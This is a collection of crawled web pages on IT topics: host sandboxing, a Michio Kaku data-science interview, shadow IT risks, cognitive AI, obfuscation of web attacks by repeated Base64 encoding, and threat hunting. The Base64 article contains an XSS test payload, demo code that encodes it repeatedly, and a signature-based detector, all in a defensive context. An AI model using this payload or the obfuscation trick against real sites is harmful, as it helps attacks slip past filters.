So when using hosts, there is no need to worry too much: there are many applications and techniques that can help, and one should know about all of them. That way, it is possible to fend off many of the attacks that could do serious damage to the applications on the host or lead to a compromise of the data.
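To make the sandboxing idea concrete, here is a minimal Python sketch that runs an untrusted program as a child process with hard resource limits, using only standard-library calls on Unix-like systems. This is a crude illustration of the concept, not a real sandbox: production sandboxes (such as the one enforced in the Mac App Store) also restrict file, network, and device access, and the target script name below is a hypothetical placeholder.

```python
import resource
import subprocess
import sys

def limit_resources():
    """Runs in the child just before exec: cap CPU time and memory."""
    resource.setrlimit(resource.RLIMIT_CPU, (2, 2))              # 2 CPU-seconds
    resource.setrlimit(resource.RLIMIT_AS, (256 * 2**20,) * 2)   # 256 MiB of address space

def run_sandboxed(cmd: list[str]) -> int:
    """Run a command under the limits above (Unix only)."""
    return subprocess.run(cmd, preexec_fn=limit_resources).returncode

if __name__ == "__main__":
    # "untrusted_script.py" is a hypothetical example target.
    sys.exit(run_sandboxed([sys.executable, "untrusted_script.py"]))
```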
<urn:uuid:567361bf-947c-41cf-8929-0b66dfa62f22>
CC-MAIN-2022-40
https://www.examcollection.com/certification-training/security-plus-how-to-establish-host-security.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00269.warc.gz
en
0.977937
2,367
3
3
In the universe of data science and analytics, data has become as ubiquitous as air. It surrounds us and impacts our everyday lives, whether we are conscious of it or not. Recently, we sat down with theoretical physicist Dr. Michio Kaku, one of the most widely recognized figures in science in the world today, to discuss his theories on the future of data science.

“We have learned more about the brain in the last fifteen years than in all prior human history, and the mind, once considered out of reach, is finally assuming center stage.” A ponderance akin to the perspective found in modern analytics. —Dr. Michio Kaku

What role has data played in your work and how has it evolved over time?

Data is the lifeblood of any science. Just rattle off a list of them and you can see why data is so important. For example, in aeronautics, people want to revive supersonic transport. We had one in the Concorde, but the Concorde created a sonic boom that shattered windows. Nobody wanted the Concorde flying overhead. The Concorde was financially troubled because it could not fly across the United States, for example.

As Big Data only gets bigger and the universe of analytics expands to allow anyone to be a data savant, we continue to see people take on professions they otherwise may not have fit into in the past. Data science is inherently complex, but still accessible, understandable, and achievable for those not classically trained. Those who change careers or become "citizen data scientists" often have deep expertise in another field, which means they bring the right questions to the table, and data democratization enables them to answer those questions.

What advice would you share with those explaining complex concepts in a way that is accessible?

Data is going to be the lifeblood and the energy source of modern civilization. And we can't drown in data. We have to be able to explain to the public why data is so important and why it's going to fuel the revolutions of the future. We'll need to explain that data is to the coming revolutions what oil was to the previous ones. Data will be the lifeblood of the next revolutions, coupled with artificial intelligence, big data, analytics, and all the concepts we've come to associate with data.

We're going to be able to digitize society. Every aspect of society is going to be turned upside down by data. Any industry, any scientific discipline, will be digitized and analyzed by analytics and artificial intelligence. We have to be able to explain this to the average person because they're going to benefit from it.

Aha moments are quite thrilling for those who are using analytics to make a real impact. Can you describe your process or some of your techniques for coming to some of your own aha moments?

Sometimes we can know too much. You think you know something so well that when something deviates from your common sense, you say, “ah, that can't be right. It must be wrong.” And you close yourself off from out-of-the-box ideas, which may hold the final solution to the problem.

Is there a process you adopt to acknowledge that oddball idea?

That's what separates the great scientists from those who are not so great. The great scientist can see patterns that other scientists cannot see. Artificial intelligence tries to use computers to find patterns, but many times humans are better at finding patterns than robots. Robots tend to be very conservative.
Humans can make leaps of logic, and sometimes that's required to find the aha moment that makes everything work.

"Analytics allows us to explore areas that we once thought were out of reach. Look at, for example, my field, physics: the Large Hadron Collider generates enormous quantities of data, tremendous quantities of data, every time we smash protons apart. Analytics allows us to analyze this mountain of data. It accesses areas of physics that we thought were out of reach because they were just computationally too difficult."

Hear Dr. Kaku on the Alter.Everything podcast. Find out more about Michio Kaku and his contributions within the data science and analytics community. Check out A Brief History on the Evolution of Analytics to learn all about the history of analytics and where it's going next.
<urn:uuid:7df142f0-0b65-4a38-8827-fcf988a0ff75>
CC-MAIN-2022-40
https://www.alteryx.com/input/blog/ask-a-theoretical-physicist-the-science-of-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00269.warc.gz
en
0.946805
1,027
2.796875
3
Using unapproved tools, software, and devices is risky: you never know what vulnerabilities so-called shadow IT may have. The pandemic that began in 2020 put a new spin on the shadow IT problem. The sudden need to handle all processes remotely was a true challenge, since the majority of corporate networks were not configured to be safely accessed by employees from home. And although it may seem that telecommuters have gotten used to the security rules for remote work, there's a risk they have learned how to get around them.

Using unauthorized third-party software while accessing corporate networks may pose a danger to an organization's critical assets. In this article, we define what shadow IT is and why employees use unapproved software. We also specify the major cybersecurity risks that shadow IT can cause and offer six ways to effectively address them.

Shadow IT: definition and types

What is shadow IT? Shadow IT refers to any IT system, solution, device, or technology used within an organization without the knowledge and approval of the corporate IT department. Common examples of shadow IT are cloud services, file-sharing applications, and messengers that aren't explicitly allowed according to an organization's cybersecurity rules and guidelines. The risk of using such software is that it can have cybersecurity flaws and lead to various incidents like sensitive data exposure.

There can be various sources of shadow IT. The four most common are:

- File storage solutions. Employees often need to share files, folders, and screenshots with each other. The danger is that they can choose solutions that don't secure data well enough, such as Lightshot, whose captured screenshots can be openly accessed. Using personal Dropbox and Google Drive accounts also constitutes insecure data sharing.
- Productivity, collaboration, and project management tools. Aiming to better organize teamwork, collaborate with colleagues, and improve productivity, employees often experiment with online services. But using unvetted tools like Trello, Asana, and Zoom for sharing work-related information may be a cause of unintentional data leaks.
- Messaging apps. People often use messengers for both work-related and non-work-related chats. This can be a severe cybersecurity issue if workers share corporate files, data, and credentials in unsanctioned messengers like WhatsApp, Signal, or Telegram. To avoid that, it's essential to ensure the communication tools your employees use are consistent and secure.
- Email services. The majority of employees have at least two email addresses: a personal one and a corporate one. With an average of 121 business emails sent and received per employee each day, workers can get mixed up between their email accounts and unintentionally expose sensitive data to third parties.

To efficiently address the risks of shadow IT, we need to understand why employees turn to unapproved IT solutions in the first place. Let's explore the most common reasons in the next section.

Why do people use shadow IT? In most cases, employees find an organization's IT solutions inefficient. Instead of sticking to them, workers adopt new technologies that help them do their jobs faster and achieve better results. Another possible reason is that employees simply have their own set of preferred software and services they feel comfortable working with.
Let's explore the most common reasons why people choose unapproved IT solutions over standard software packages:

- Employees find approved software and services inefficient
- Approved software is complicated and uncomfortable to work with
- Allowed solutions are incompatible with employees' devices
- Employees don't fully understand the security risks posed by shadow IT

As you can see, a common problem is that corporate IT infrastructure operates slowly and makes day-to-day work processes inconvenient. Plus, regular users often don't know which solutions belong to shadow IT and what risks they pose. So instead of turning to the corporate IT department for help and assistance, employees start using unapproved software and services for their day-to-day work.

Why do you need to keep an eye on shadow IT? What are the risks of shadow IT? The presence of unknown and unapproved software and devices within organizational networks creates a lot of issues for cybersecurity departments.

In April 2021, Insight Global admitted that the personal information of some Pennsylvanians had been exposed to third parties. This unintentional data leak was caused by employees who used several Google accounts for sharing information as part of an unauthorized collaboration channel. The data included the names of people who may have been exposed to COVID-19, email addresses, and other information needed by social services.

Security gaps caused by shadow IT can also create new opportunities for hackers. Hackers can hijack a vulnerable device that's connected to a corporate network (this could be someone's personal laptop or smartphone) and use it to exfiltrate data or launch a DDoS attack.

Here are the six most significant risks and challenges posed by shadow IT:

Lack of IT control
If your IT department doesn't know about software that exists within the corporate network, they can't check whether it's safe to use and ensure that corporate assets are secured. This lack of control over the solutions used within the corporate network expands the attack surface.

Data loss and data leaks
When using shadow IT solutions, some employees may get access to data they aren't supposed to have access to. Another problem is the risk of losing critical data. There's a chance that an unapproved application doesn't ensure data backups and that employees haven't thought about creating a proper recovery strategy. Thus, if something happens, important data may be lost.

Unpatched vulnerabilities and errors
Software vendors constantly release new patches to resolve vulnerabilities and fix errors found in their products. Usually, it's up to a company's IT team to keep an eye on such updates and apply them in a timely manner. But when it comes to shadow IT, administrators can't keep all products and devices up to date simply because they're unaware of their existence.

Compliance issues
Shadow IT may break compliance with various regulations, standards, and laws, which in turn may lead to fines, lawsuits, and reputational losses. For instance, under the General Data Protection Regulation (GDPR), organizations are obliged to process users' personal data lawfully, fairly, and transparently. But without knowing all of the software used by their employees, companies can't ensure that only authorized workers can access sensitive data.

Reduced efficiency
Even though boosting efficiency is one of the reasons many people start using shadow IT in the first place, chances are high that the result will be the complete opposite.
Every new technology needs to be checked and tested by the IT team before being implemented in the corporate infrastructure. This is necessary to ensure that new software works correctly and that there are no software and hardware conflicts or serious failures.

Increased costs
Unapproved software and services often duplicate the functionality of authorized ones, meaning your company spends money inefficiently. Apart from that, shadow IT risks may lead to real incidents, which in turn incur expenses for damage control, fines for non-compliance with cybersecurity requirements, and legal fees.

What to do with shadow IT in your organization? The short answer is to improve management of all technology resources. There's no sense in trying to get rid of shadow IT completely, since workers will always find ways to use the solutions they want. Moreover, shadow IT can help your organization improve the efficiency of its business processes. The best tactic for dealing with shadow IT is to:

1. Define the major risks posed by shadow IT and address them. We'll take a closer look at mitigation tactics in the next section.
2. Encourage employees to be transparent about what software they use. First, this will help you detect the use of risky solutions. Second, new tools adopted by your employees may turn out to be more efficient than your standard software.
3. Educate employees on the possible consequences of using untrusted software. Overwhelmed with their routine work, people may forget to mention additional tools they use. But clearly understanding the potential risks and consequences of adopting new solutions will make workers think twice before trying new software without consulting the IT department.
4. Ensure that your IT department considers solutions that are both secure and convenient. There's a chance your system administrators and IT specialists pay attention only to the security details of software, ignoring its convenience for workers. Establish communication between employees and the IT department to make sure they agree on software that meets both security requirements and employees' expectations.

When approaching the shadow IT problem carefully, you can not only detect cybersecurity risks but also test various technologies and choose more efficient tools for your organization. Doing so may help you optimize your expenses and find weak spots in current work processes. Now, let's explore in detail how you can address common shadow IT risks.

How to mitigate shadow IT risks
In order to get the most benefit out of your employees' initiatives, you should be able to mitigate the risks coming from the use of shadow IT. Here are six efficient strategies for mitigating shadow IT security risks in your organization:

1. Build a flexible corporate policy
A well-thought-out corporate policy that addresses your business's most critical cybersecurity issues is a must. To achieve it, start by establishing comprehensible guidelines around the use of personal devices, third-party applications, and cloud services. For starters, you can divide your software into categories to help employees better understand the risks of using shadow IT and offer them alternatives. Here are examples of categories in which you can place shadow IT resources:

- Sanctioned. Tools that are approved by an organization's IT department and recommended for use within the corporate network
- Authorized. Additional software whose use is allowed
- Prohibited.
Potentially dangerous solutions that may have vulnerabilities or store data insecurely

In case employees want to use solutions absent from the lists of sanctioned and authorized software, they should first ask your IT department to check their security. After checking a tool's security, the IT department will then add it to the sanctioned, authorized, or prohibited category.

2. Educate your employees on shadow IT
One of the most effective ways to mitigate shadow IT risks is to educate your employees about the true dangers of using unapproved software. People often don't fully understand the possible consequences of their actions and don't realize the risks. By explaining the true reasons behind shadow IT prohibitions, you can significantly lower the number of unsanctioned software installations. It will also help you encourage workers to be more transparent about the difficulties they have with approved solutions and the true reasons for secretly deploying alternatives.

3. Give your employees the tools they need
Remember why people usually turn to shadow IT in the first place? In most cases, it's because the standard corporate tools aren't effective and convenient enough. A good practice is to create a space for open communication between workers and the IT department. When you learn what your employees really need, you can find efficient software and eliminate the risk of employees using unapproved software in secret. In case a solution your employees want to use isn't secure enough or may lead to non-compliance with requirements, it's essential to clearly explain the potential risks. And if possible, offer alternatives that provide the required data security.

4. Keep an eye on the cloud
Not all cloud-based services provide decent data security. Various SaaS products and cloud services like Salesforce and Dropbox hold a special place in shadow IT. According to a 2021 survey, for 86% of respondents the annual cost of cloud accounts was over $500,000. The risk of data leaks is especially high if your employees choose freemium models and continuously move from one tool to another, leveraging free trials and putting sensitive data at risk. This is why it's crucial to make sure that the cloud-based solutions approved for use within your organization are secure and consistent.

5. Use shadow IT discovery tools
Without knowledge, there's no control. Detecting unapproved applications will help you instantly take the necessary actions and minimize possible consequences. To do that, adopt solutions that monitor your corporate networks and detect:

- Anomalous network activities
- Software downloading and installation
- Data and workload migrations
- Other indicators of possible shadow IT practices

6. Monitor your networks and employee activity
Monitoring what happens within your corporate network is an effective way to gather information about the software, applications, and web resources your employees work with. Based on this knowledge, you can detect who in your company starts using unapproved IT solutions and when. Apart from that, you can apply user activity monitoring to detect and address insider threats. Employee monitoring can also help you comply with various cybersecurity laws and regulations, since a lot of requirements oblige you to ensure that only authorized users can access sensitive data.
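To illustrate the sanctioned/authorized/prohibited split from strategy 1, here is a minimal Python sketch of a process audit. The category lists are invented placeholders (a real policy would come from the IT department's software inventory), and the sketch relies on the third-party psutil package rather than on any particular discovery product.

```python
import psutil  # third-party: pip install psutil

# Placeholder policy lists for illustration only.
SANCTIONED = {"outlook.exe", "teams.exe", "excel.exe"}
AUTHORIZED = {"slack.exe", "notepad++.exe"}
PROHIBITED = {"utorrent.exe", "anydesk.exe"}

def classify(name: str) -> str:
    """Map a process name to its policy category."""
    n = name.lower()
    if n in SANCTIONED:
        return "sanctioned"
    if n in AUTHORIZED:
        return "authorized"
    if n in PROHIBITED:
        return "prohibited"
    return "unknown"  # candidates for review by the IT department

def audit_processes() -> dict[str, set[str]]:
    """Group currently running processes by policy category."""
    report: dict[str, set[str]] = {}
    for proc in psutil.process_iter(["name"]):
        name = proc.info["name"] or ""
        report.setdefault(classify(name), set()).add(name)
    return report

if __name__ == "__main__":
    report = audit_processes()
    for category in ("prohibited", "unknown"):
        for name in sorted(report.get(category, set())):
            print(f"{category}: {name}")
```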
Ensure efficient and robust monitoring with Ekran System

Ekran System is an insider risk detection platform that provides you with complete information about user activities, whether users are in-house employees, remote workers, or subcontractors. Our solution thoroughly records employees' activities, capturing a wide range of metadata such as launched applications, keystrokes, and opened websites. When reviewing user session records, you can easily search by these parameters and detect the use of prohibited software in only a few clicks. Ekran System can help you:

- Monitor software use. See what kind of software your employees use and how. This allows you to not only discover shadow IT sources but also understand how shadow IT originated and why it persists.
- Monitor internet use. Receive information about the websites visited by your employees and the time spent on each. In this way, you can discover unauthorized use of cloud services.
- Monitor and block USB devices. Detect connected USB devices and block them automatically or manually. This can be useful in stopping shadow IT, particularly if the use of USB devices is prohibited by your company's security policy.
- See firsthand what happens to your sensitive data. With Ekran System, you can see exactly how your sensitive data is accessed and used — and by whom. This can help you detect and target shadow IT applications that directly interact with sensitive data. Then, you can adjust the selection of approved software in order to improve the effectiveness of current processes and mitigate the need for shadow IT.

Shadow IT is not only a cybersecurity issue but can also be a symptom of an inefficient IT strategy. By listening to the needs of your employees and providing them with tools that are both effective and secure, you can significantly reduce shadow IT-related risks and increase your employees' productivity. Still, clearly understanding the possible dangers of shadow IT is vital for ensuring proper security of your organization's critical assets. Once you define shadow IT risks, you can better detect the use of insecure software, establish continuous user activity monitoring, and plan employees' cybersecurity education.

If you're ready to enhance your cybersecurity strategy with an efficient user monitoring solution, try Ekran System. Request a 30-day trial to see how exactly our solution can meet your needs.
<urn:uuid:a90ed7fb-0c06-46ea-8bfc-be0456a3da08>
CC-MAIN-2022-40
https://www.ekransystem.com/en/blog/shadow-it-risks
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00269.warc.gz
en
0.92404
3,151
2.625
3
Since the beginning of computing, AI has always been the end target, and with modern cognitive computing models, we seem to be getting closer to that goal every day.

Copyright by autome.me

Due to the amalgamation of cognitive science with the fundamental principle of simulating the human thought process, cognitive AI applications have far-reaching impacts not only on our private lives but also on industries such as medicine, banking, and more. The benefits of cognitive technology go a step beyond those of conventional AI systems. While the basic use case of artificial intelligence is to apply the best algorithm to solve a problem, cognitive computing tries to mimic human intelligence and reasoning by evaluating a whole set of variables. Computer systems able to do that bring us closer to machines as intelligent as humans, able to assist humans in their daily roles. Let's see how cognitive AI is making, and will continue to make, our world a better place.

Cognitive AI Makes Our Cities Better
In the rush of rapid development, most of our cities grew at an exponential rate, causing commuting, transportation, water, road, drainage, and other city systems to run into several issues. To avoid these, we need to manage and track the processes that hamper the progress of ordinary citizens. By making sense of data from traffic cameras, mapping the busiest locations, and rerouting traffic, cognitive technology can come to commuters' rescue. Cognitive computing could also assist with traffic management by analyzing social and customer behavior. As for a city's aging infrastructure, analytics can help policymakers determine what, when, where, and how to maintain or replace decaying equipment under a smarter city plan, before it affects too many people.

Cognitive AI Makes Our Businesses Efficient
Cognitive computing can identify emerging trends, spot new business opportunities, and take real-time accountability for important process-centered issues. A cognitive computing system can automate procedures, reduce errors, and adapt to changing circumstances by analyzing vast amounts of data. While this prepares companies to build an appropriate response to uncontrollable circumstances, it helps create effective business processes at the same time. By introducing robotic process automation (RPA), existing systems can improve customer interactions. Because cognitive computing surfaces only appropriate, meaningful, and valuable information, it improves the customer experience and thus makes customers happier and much more engaged. […]

Read more: autome.me
<urn:uuid:acc26cad-2ba3-46f3-b185-794fd7369c68>
CC-MAIN-2022-40
https://swisscognitive.ch/2021/06/25/3-ways-cognitive-ai-and-computing-are-making-our-lives-better/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00469.warc.gz
en
0.930168
532
3.046875
3
Web application threats come in different shapes and sizes. These threats mostly stem from web application vulnerabilities, published daily by the vendors themselves or by third-party researchers, and promptly exploited by vigilant attackers. To cover their tracks and increase their attack success rate, hackers often obfuscate attacks using different techniques. Obfuscation of web application attacks can be extremely complicated, involving custom-made encoding schemes built by the attacker to suit a specific need. Alternatively, as described in a recent spam campaign research we conducted, obfuscation of web application attacks can be as simple as importing common encoding schemes and re-encoding the attack payloads multiple times.

In this blog post, we'll dive deep into one of the simplest obfuscation techniques commonly used by web application attackers – Base64 – and uncover some of the traits making it so unique and interesting from the defender's perspective.

What is Base64? Base64 is an encoding mechanism used to represent and stream binary data over mediums limited to printable characters only. The name Base64 comes from the fact that each output character is represented in 6 bits, hence there are 64 characters that can be represented: lower- and upper-case letters, digits, and the "+" and "/" signs. Originally, Base64 encoding was used to safely transfer email messages, including binary attachments, over the web. Today, Base64 encoding is widely used to transfer any type of binary data across the web as a means to ensure data integrity at the recipient.

In short, Base64 takes three 8-bit ASCII characters as input, 24 bits in total. It then splits these 24 bits into four parts of 6 bits each and translates each 6-bit part into a character using the Base64 encoding table. If there are fewer than three input characters, the encoding pads the Base64 output using the "=" sign.

Since Base64 is commonly used to encode and transfer data over the web, security controls often decode the traffic as a preprocessing step just before analyzing it. Unfortunately, this encoding technique is often abused and used to carry obfuscated malicious payloads disguised as legitimate Base64-encoded content.

Attacks Encoded in Base64 – The Tells

While Base64 encoding is very useful for transferring binary data over the web, there is no practical need to encode the same text multiple times. With that in mind, it's a common practice among attackers to obfuscate their attacks using multiple encodings of the same text, to the extent of encoding an attack a few dozen times to evade detection. Thanks to some interesting characteristics of Base64, however, encoding the attack payload multiple times actually makes things worse for the attacker and easier for the defender.

1. Inflated Output Size

Every three 8-bit characters encoded in Base64 are transformed into four characters, which is why multiple Base64 encodings inflate the output. More precisely, the output grows exponentially, multiplying by a factor of 4/3 (about 1.333) with each encoding (see Figure 1).

2. Fixed Prefix

A unique attribute of Base64 encoding is that any text encoded enough times will eventually share the same prefix, which always begins with the letters "Vm0wd". This same prefix appears whenever multiple Base64 encodings are applied, and the prefix grows longer as more encodings are done (Figures 2 and 3).
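Both tells are easy to see with a few lines of Python; the starting payload below is an arbitrary example:

```python
import base64

payload = b"<script>alert(1)</script>"  # arbitrary example input

for i in range(1, 11):
    payload = base64.b64encode(payload)
    # After a handful of rounds the prefix settles on "Vm0wd...",
    # while the length grows by a factor of about 4/3 per round.
    print(f"round {i:2}: length {len(payload):5}  prefix {payload[:8].decode()}")
```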
For more details on the fixed prefix (why it always appears no matter the input, and the rate at which its size grows), see the detailed Technical Appendix below.

Attacker Lose-Lose Situation

Attackers trying to obfuscate their attacks using multiple Base64 encodings face a dilemma. Either they encode their attack payload a small number of times, making it feasible for the defender to decode and identify it; or they encode the input many times, generating a very large payload that is unfeasible to decode but carries a stronger fixed Base64 prefix fingerprint for the defender to detect.

The net net: Multiple Base64 encoding = Longer fixed prefix = Stronger attack detection fingerprint

There are three primary strategies to consider for mitigating attacks encoded in Base64:

Multiple Decoding
Attacks encoded multiple times in Base64 may be mitigated by decoding the input several times until the real payload is revealed. This method might seem to work, but it opens the door to another vulnerability: denial of service (DoS). Decoding a very long text multiple times can take a lot of time. While attackers need to create the long encoded attack only once, the defender must decode it on every incoming request in order to identify and mitigate the attack in full. Thus, decoding the input several times lets attackers launch DoS attacks by sending several long encoded texts. Additionally, even if the defender decodes the input many times, say ten, the attacker can just encode the attack once more and evade detection. So decoding the input multiple times is neither sufficient nor efficient when attacks are encoded multiple times. Fortunately, in the case of Base64, the special characteristics of the encoding scheme offer other ways to mitigate multiple encodings.

Suspicious Content Detection
As described above, more Base64 encoding = longer fixed prefix = stronger attack detection fingerprint. Accordingly, defenders can easily detect and mitigate attacks heavily obfuscated by multiple Base64 encoding. A web application firewall (WAF) can offer protection based on this detection. Imperva's cloud and on-prem WAF customers are protected out of the box from these attacks by utilizing the fixed-prefix fingerprint phenomenon, based on the assumption that legitimate users have no practical need to encode the same text multiple times.

Abnormal Requests Detection
As discussed earlier, increased Base64 encoding equates to increased payload size. Subsequently, defenders can determine the size of a legitimate incoming payload/parameter/header value and block inflated payloads exceeding the predefined limits. Imperva's cloud and on-prem WAF customers are protected out of the box here as well, through web application profiling, which learns the application's incoming traffic over time and flags abnormalities, combined with HTTP hardening policies that block illegal protocol behavior such as abnormally long requests.

Base64 is a popular encoding used to transfer data over the web. It is also often used by attackers to obfuscate their attacks by encoding the same payload several times. Due to some of the characteristics of Base64 encoding, it is possible to detect and mitigate attacks that are obfuscated with several Base64 encodings. To read more about these characteristics, see the Technical Appendix below. You can also read more about mitigation techniques using a web application firewall.
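Here is a minimal sketch of how a defender might combine the three strategies: a bounded decode loop plus the prefix and size fingerprints. The thresholds and the signature check are arbitrary choices for illustration, not values taken from any WAF product.

```python
import base64
import binascii

MAX_ROUNDS = 10          # bound the decode loop to avoid DoS
MAX_LENGTH = 4096        # arbitrary per-parameter size cap
FIXED_PREFIX = b"Vm0wd"  # fingerprint of heavy Base64 re-encoding

def inspect(value: bytes) -> str:
    """Classify an incoming parameter value; returns a verdict string."""
    if len(value) > MAX_LENGTH:
        return "block: abnormally long value"
    if value.startswith(FIXED_PREFIX):
        return "block: multiple-Base64 fingerprint"
    # Bounded decoding: peel at most MAX_ROUNDS layers, then give up.
    current = value
    for _ in range(MAX_ROUNDS):
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break  # not valid Base64, so stop peeling
        if decoded == current:
            break
        current = decoded
    # Hand the (partially) decoded value to an ordinary signature check.
    if b"<script" in current.lower():
        return "block: payload matched signature after decoding"
    return "allow"

if __name__ == "__main__":
    attack = b"<script>alert(1)</script>"
    for _ in range(3):
        attack = base64.b64encode(attack)
    print(inspect(attack))  # -> block: payload matched signature after decoding
```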
How Base64 Works
The basic idea behind the Base64 encoding technique is to take three characters, each represented in 8 bits, and turn them into four characters, each represented in 6 bits.

In more detail: assume we get three ASCII characters. Each character is mapped to an 8-bit number between 0 and 255 based on the ASCII table (see Figure 4). We take the 8-bit representations of the three characters and join them together to get 24 bits. Next, we split these 24 bits into four parts of 6 bits each and translate each part using the Base64 table (Figure 5). Each 6-bit group has 64 possible values (hence the name Base64); the available characters are digits, lowercase and uppercase letters, and the symbols '+' and '/'.

Overall, Base64 encoding splits the input text into groups of three characters and encodes each group as described above. At the end of the process, we might be missing one or two characters to complete the last trio. To solve this, the encoding pads the input with one or two zero bytes to complete the last 3-byte group, and the corresponding output characters are transformed into '='. That is why we sometimes see Base64-encoded text that ends with one or two '=' characters.

Here is an example of how Base64 works on a simple three-character word, "Man": 'M' = 77 = 01001101, 'a' = 97 = 01100001, 'n' = 110 = 01101110. Joined into 24 bits and split into four 6-bit groups, this gives 010011 | 010110 | 000101 | 101110 = 19, 22, 5, 46, which the Base64 table maps to "TWFu".

The fixed prefix
No matter what string is encoded, after encoding to Base64 multiple times we always end up with the same fixed prefix, which starts with "Vm0wd". The reason for this phenomenon is the way the encoding works and, surprisingly, how the letter 'V' behaves under the encoding.

First, let's try to encode the letter 'V' using Base64. In ASCII, the letter 'V' is 86, which in 8-bit representation is 01010110. After encoding, and ignoring the padding since we are interested only in the prefix, we take only the first 6 bits of the representation: 010101. In Base64 this is 21, which surprisingly is also 'V'. This means that every time we try to encode anything that starts with the letter 'V', we end up with an encoded string that also starts with 'V' (!). This is a never-ending loop.

| Letter | ASCII (8 bits) | First 6 bits | Base64 |
| --- | --- | --- | --- |
| V | 01010110 | 010101 (= 21) | V |

After checking the rest of the characters, 'V' is the only one that has this special attribute. So 'V' is the only character we can put at the beginning of the string we want to encode and end up with the same character at the beginning of the encoded string.

The next question is: if we encode some random string using Base64, will we always get an encoded string that starts with 'V' after a couple of encodings? The answer is yes. The relationship can be drawn, bottom-up, as a graph of the Base64 re-encoding outcome for each readable ASCII character and digit, with each color representing the encoding distance to 'V': blue for four encoding iterations; green for three; yellow for two; orange for one. For instance, it takes four encoding iterations to get to 'V' from 'k' (k->a->Y->W->V) and two iterations from 'P' (P->U->V). Overall, the minimal number of iterations to get to 'V' is, of course, 0 ('V'->'V'), while the maximum is 5 (for instance, starting with ASCII character 128: ->w->d->Z->W->V).

After the 'V' of the prefix is set, further encodings produce longer fixed prefixes. We tested all the available characters and saw that it takes at most two more encodings to get the next prefix character, "m", and at most two more encodings to get the character after that, "0".
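The graph itself didn't survive the page extraction, but a short script reproduces its data: the number of re-encodings each starting character needs before the output begins with 'V'.

```python
import base64
import string

def rounds_to_v(ch: str, limit: int = 10) -> int:
    """How many Base64 encodings until the output starts with 'V'?"""
    data = ch.encode("ascii")
    for i in range(limit + 1):
        if data[:1] == b"V":
            return i
        data = base64.b64encode(data)
    return -1  # did not converge within the limit (should not happen)

if __name__ == "__main__":
    for c in string.ascii_letters + string.digits:
        print(c, rounds_to_v(c))
    # Per the analysis above, every character reaches 'V' within five rounds,
    # e.g. 'k' takes 4 (k->a->Y->W->V) and 'P' takes 2 (P->U->V).
```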
Before moving on to longer prefixes, let's try to understand why this phenomenon happens. Take the string 'Vm0' and encode it using Base64: the result is 'Vm0w'. What happened here is that the first 6 bits of 'V' in its 8-bit representation are exactly its 6-bit representation. Taking the extra 2 bits from its 8-bit representation and adding the first 4 bits of the 8-bit representation of 'm' gives exactly the 6-bit representation of 'm'. The same logic goes for the representation of '0'. Note that we are left with a remaining 6 bits, which is the 6-bit representation of 'w'. In other words, what makes the 'Vm0' prefix special is that its 8-bit representation lines up with its 6-bit representation.

Inflation of the prefix
It is noteworthy that after encoding the first three letters of the fixed prefix, there is a leftover of 6 bits. These 6 bits determine the next letter of the prefix. In fact, for every three letters added to the fixed prefix, encoding leaves an extra 6 bits that determine one extra character of the prefix. This means that with each extra encoding, the fixed prefix grows by the number of letters in the prefix divided by three. For example, if there are nine characters in the fixed prefix, then after another encoding there will be twelve characters in the fixed prefix.
<urn:uuid:cd35b36f-9184-43ae-826a-ccb6b6efac81>
CC-MAIN-2022-40
https://www.imperva.com/blog/the-catch-22-of-base64-attacker-dilemma-from-a-defender-point-of-view/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00469.warc.gz
en
0.91195
2,683
3.015625
3
The "reactive trend" in cyberthreat monitoring is a critical issue because it shows that most organizations don't hunt until an event has already been identified; they simply respond to intrusion detection systems and event warnings. It is pointless, for instance, to simply build a SIEM (Security Information and Event Management) system and wait for the alerts to arrive. Note that organizations with different environments and security team goals can describe hunting in different ways, for instance as hunting for vulnerabilities or attributing threats to offenders. The Cyber Threat Hunting Realistic Model describes threat hunting as an efficient, analyst-led process in which attackers' strategies, techniques, and procedures are actively searched for within the environment.

What Makes Threat Hunting Different?

Threat hunting means identifying, researching, and refining leads, on the principle that it is the hunters who find the threat. Threat hunting is an ongoing activity; this proactive stance is critical, and it requires extensive knowledge of threats and inside-and-out experience with the company's IT systems. Although threat hunting methods are used by the security team to detect risks, the team itself is the key part of delivery.

CYBER ATTACK ANATOMY

Threat actors such as cybercrime organizations, nation-state hackers, and hackers for hire have different reasons for targeting an organization:

Commercial benefit: Malicious hackers steal information for direct or indirect financial benefit; for example, hackers steal credit card information to profit from it. Hackers may also compromise a corporate database to obtain access to personal data and sell it on the dark web.

Intellectual property theft: Hackers steal military or industrial secrets, trade secrets, and details of goods such as aircraft, cars, arms, and electronic components, often with the intent of spying on competitors.

Critical infrastructure disruption: Hackers interrupt or compromise networks, such as energy generation, water supply, and transportation systems, to cause instability.

Political issues: Attackers and "hacktivists" target sites to make a political statement.

Malicious insiders: A malicious insider is an employee who exposes private company information and/or exploits company vulnerabilities. Malicious insiders are often unhappy employees. Users with access to sensitive data and networks can inflict extensive damage through privileged misuse and malicious intent.

Common Attack Vectors

Here are some of the most common ways cybercriminals deliver a payload and exploit device vulnerabilities:

PHISHING: An email that encourages the recipient to click a malicious link or open an infected file.

DRIVE-BY DOWNLOADS: Malware downloaded inadvertently from a compromised website, usually by taking advantage of bugs in the operating system or a network service.

DOMAIN SHADOWING: If a hacker possesses credentials for the domain registrar, they can add host records to an entity's DNS records and then redirect users to these malicious IPs.

MALWARE: Malicious code that interferes with services, gathers data, or gains access. Different malware strains vary in their infection and propagation characteristics.

DENIAL-OF-SERVICE: An effort to make a device or network unavailable, typically by consuming more computing or network resources than the target can manage.

MALVERTISING: Internet advertising controlled by cybercriminals.
When a user clicks the ad, which can appear on any site, including well-known sites visited daily, malicious software is downloaded to the user's system.

